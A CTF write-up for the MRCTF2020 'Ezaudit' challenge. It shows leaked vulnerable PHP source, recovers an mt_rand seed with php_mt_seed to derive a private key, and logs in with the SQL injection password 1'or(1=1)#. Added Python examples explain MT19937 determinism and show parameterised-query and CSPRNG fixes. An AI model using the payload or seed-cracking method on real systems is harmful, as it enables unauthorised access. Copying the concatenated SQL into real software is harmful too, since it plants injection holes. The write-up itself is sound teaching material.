[CTF] Writeup No. 40

[MRCTF2020]Ezaudit

Approach

The page shows nothing at all, so we try a directory scan.

[21:13:07] Starting:
[21:13:18] 200 -    1KB - /www.zip
[21:19:13] 301 -  185B  - /assets
[21:24:03] 301 -  185B  - /images
[21:25:26] 200 -  852B  - /login.html
[21:25:27] 200 -    3B  - /login.php

dirsearch finds www.zip, which contains the source of index.php:

<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // If any field is empty, treat it as not filled in, show an error and return to the login page after 3 seconds
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }
    else{
        if($Private_key === '************'){
            // $password is concatenated straight into the SQL text: this is the injection point
            $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';';
            $link=mysql_connect("localhost","root","root");
            mysql_select_db("test",$link);
            $result = mysql_query($getuser);
            while($row=mysql_fetch_assoc($result)){
                echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
            }
        }
    }
}

// generate public_key
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
}

// generate private_key (drawn from the same mt_rand stream as public_key, right after it)
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
$Public_key = public_key();
//$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

Solution

Reading the source, the task is simple: recover the mt_srand seed that produced private_key, then SQL-inject the password.

Generating private_key

First, from the given public_key, we work backwards to the value and the range of every mt_rand call that produced it.

<?php
// Known Public_key (from the comment in the leaked source); emit, in order, the value
// each mt_rand call must have returned while generating it
$Public_key = "KVQP0LdJKRaV3n9D";
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$length = strlen($Public_key);
$random_numbers = [];

for ($i = 0; $i < $length; $i++) {
    $char = $Public_key[$i];
    $pos = strpos($strings1, $char);
    $random_numbers[] = $pos;
    $random_numbers[] = $pos;
    $random_numbers[] = 0;
    $random_numbers[] = strlen($strings1) - 1;
}

$reversed_mt_rand_sequence = implode(' ', $random_numbers);
echo "Reversed mt_rand sequence: " . $reversed_mt_rand_sequence;
// Output format: groups of four, the php_mt_seed argument format
// [[lower bound of value, upper bound of value], [lower bound of the mt_rand range, upper bound of the mt_rand range]]

Reversed mt_rand sequence: 36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

Now we find the seed; php_mt_seed is used here.

# ./php_mt_seed 36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61
Pattern: EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 694.2 Mseeds/s 
Version: 5.2.1+
Found 0, trying 0x68000000 - 0x69ffffff, speed 42.8 Mseeds/s 
seed = 0x69cf57fb = 1775196155 (PHP 5.2.1 to 7.0.x; HHVM)
Found 1, trying 0xfe000000 - 0xffffffff, speed 42.9 Mseeds/s 
Found 1

The seed is 1775196155.
Let's verify it:

<?php
$Public_key = "KVQP0LdJKRaV3n9D";
// Known Public_key; regenerate it from the recovered seed and compare
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$length = strlen($Public_key);
$seed_found = 1775196155;
mt_srand($seed_found);

// Attempt to regenerate the Public_key from the seeded generator
$generated_key = '';
for ($i = 0; $i < $length; $i++) {
    $rand_pos = mt_rand(0, strlen($strings1) - 1);  // mt_rand with the fixed seed
    $generated_key .= $strings1[$rand_pos];
}

echo "Generated Public Key: " . $generated_key;

Generated Public Key: KVQP0LdJKRaV3n9D

Then use the same seeded generator to produce private_key.

// Appended directly after the code above: the generator has just produced the 16
// public-key characters, so the next 12 draws are crispr's private key
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
$private_key = private_key();
echo "\nPrivate Key: " . $private_key;

Private Key: XuNhoueCDCGc
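The seed recovery above works because mt_rand() is a deterministic generator: once the seed is known, every later output follows, including the private key drawn from the same stream right after the public key. The Python below is an added example, not code from the writeup or the challenge. It models PHP 7.1+'s mt_srand()/mt_rand() (MT19937) from scratch, rebuilds a public/private key pair from a seed, and shows the CSPRNG replacement. The class PhpMt19937, the helpers mt_key_pair and secure_key, and the rejection-sampling range mapping are my own constructions; the pre-7.1 generator that php_mt_seed matched for this challenge's seed differs in its twist and range mapping and is not modelled, so seed 1775196155 yields a different, but equally reproducible, pair here.

```python
"""Added example (not from the writeup): a from-scratch MT19937 model of PHP 7.1+
mt_srand()/mt_rand(), used to show why a key drawn from mt_rand() is recoverable
by anyone who learns the seed, and what to draw it from instead."""
import secrets
import string
from typing import Optional, Tuple

# Same 62-character alphabet as the challenge's public_key()/private_key().
ALPHABET = string.ascii_letters + string.digits
UINT32_MAX = 0xFFFFFFFF


class PhpMt19937:
    """MT19937 as PHP >= 7.1 uses it in its default MT_RAND_MT19937 mode.
    Assumption: PHP 5.2.1-7.0.x (the versions php_mt_seed reported for the
    writeup's seed) used a variant twist and a different range mapping that is
    deliberately NOT modelled here; the determinism lesson is identical."""

    N, M = 624, 397

    def __init__(self, seed: int) -> None:
        self.state = [0] * self.N
        self.state[0] = seed & UINT32_MAX
        for i in range(1, self.N):  # init_genrand(), PHP's php_mt_initialize()
            prev = self.state[i - 1]
            self.state[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & UINT32_MAX
        self.index = self.N  # forces a twist before the first output

    def _twist(self) -> None:
        for i in range(self.N):
            y = (self.state[i] & 0x80000000) | (self.state[(i + 1) % self.N] & 0x7FFFFFFF)
            v = self.state[(i + self.M) % self.N] ^ (y >> 1)
            if y & 1:
                v ^= 0x9908B0DF
            self.state[i] = v
        self.index = 0

    def _rand32(self) -> int:
        """Tempered 32-bit output (PHP's internal php_mt_rand())."""
        if self.index >= self.N:
            self._twist()
        y = self.state[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & UINT32_MAX

    def mt_rand(self, lo: Optional[int] = None, hi: Optional[int] = None) -> int:
        """Userland mt_rand(): the 31-bit value with no arguments, otherwise a value
        in [lo, hi] via rejection sampling (my model of PHP 7.1+'s range reduction,
        written from memory of ext/standard/mt_rand.c; treat it as an assumption)."""
        if lo is None:
            return self._rand32() >> 1
        umax = hi - lo + 1
        r = self._rand32()
        if umax & (umax - 1) == 0:  # power of two: a mask is unbiased
            return lo + (r & (umax - 1))
        limit = UINT32_MAX - (UINT32_MAX % umax) - 1
        while r > limit:  # discard values that would introduce modulo bias
            r = self._rand32()
        return lo + r % umax


def mt_key_pair(seed: int, pub_len: int = 16, priv_len: int = 12) -> Tuple[str, str]:
    """Rebuild both keys the way index.php does: public first, then private from
    the SAME stream. That ordering is the whole weakness: the public key fixes the
    stream position, so the private key is a function of public data plus the seed."""
    rng = PhpMt19937(seed)

    def draw(n: int) -> str:
        return "".join(ALPHABET[rng.mt_rand(0, len(ALPHABET) - 1)] for _ in range(n))

    return draw(pub_len), draw(priv_len)


def secure_key(length: int = 12) -> str:
    """Replacement: a CSPRNG (PHP equivalent: random_int()/random_bytes()) has no
    recoverable seed, so a leaked public key says nothing about the private one."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    seed = 1775196155  # the seed the writeup recovered
    print("mt_rand keys:", mt_key_pair(seed))
    print("again      :", mt_key_pair(seed))  # identical on every run and host
    print("CSPRNG key :", secure_key())
```

The fix on the PHP side is the same in spirit: generate private_key with random_int() or random_bytes(), and never derive a secret from the stream that also produced a value you hand to the client.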

Login

Go to login.html and log in with:

Username    = 111
Password    = 1'or(1=1)#
Private key = XuNhoueCDCGc

Here the WHERE condition only needs to be always true.

flag{7aba75a0-65f1-417c-a4ab-2e83571c6c65}
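To see exactly why a password value can rewrite the WHERE clause, and what the corrected query looks like, here is an added Python example (not the challenge's code): it mirrors the string concatenation from index.php beside a parameterised lookup, run against an in-memory SQLite table that stands in for the challenge's MySQL user table. The helper names, the sample password and the placeholder flag are constructed for this example.

```python
"""Added example (not the challenge's code): the query construction from index.php
mirrored in Python next to a parameterised replacement, exercised against an
in-memory SQLite table standing in for the challenge's MySQL `user` table."""
import sqlite3
from typing import Optional


def build_vulnerable_query(password: str) -> str:
    """The string index.php actually builds: the password is spliced into the SQL
    text, so a quote inside it ends the literal and the remainder is parsed as SQL
    (in MySQL the trailing `#` then comments out the closing quote)."""
    return ("SELECT flag FROM user WHERE username= 'crispr' AND password = '"
            + password + "';")


def make_sample_db() -> sqlite3.Connection:
    """Constructed sample data; the password and flag are placeholders, not the real ones."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT, flag TEXT)")
    conn.execute("INSERT INTO user VALUES (?, ?, ?)",
                 ("crispr", "correct-horse-battery", "flag{placeholder}"))
    return conn


def lookup_flag(conn: sqlite3.Connection, password: str) -> Optional[str]:
    """Hardened form: the password travels as a bound parameter, never as SQL text,
    so a value such as 1'or(1=1)# is compared literally against the stored password
    and matches nothing."""
    row = conn.execute(
        "SELECT flag FROM user WHERE username = 'crispr' AND password = ?",
        (password,),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "1'or(1=1)#"  # the password used in the writeup
    print(build_vulnerable_query(payload))  # shows the literal being closed early
    db = make_sample_db()
    print(lookup_flag(db, payload))                  # None
    print(lookup_flag(db, "correct-horse-battery"))  # flag{placeholder}
```

In the PHP code itself the equivalent change is a prepared statement (mysqli_prepare()/bind_param() or PDO::prepare() with bound values) in place of the concatenated $getuser string; the old mysql_* extension the source uses offers no parameter binding at all.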

Notes

You need to know how to crack mt_rand seeds.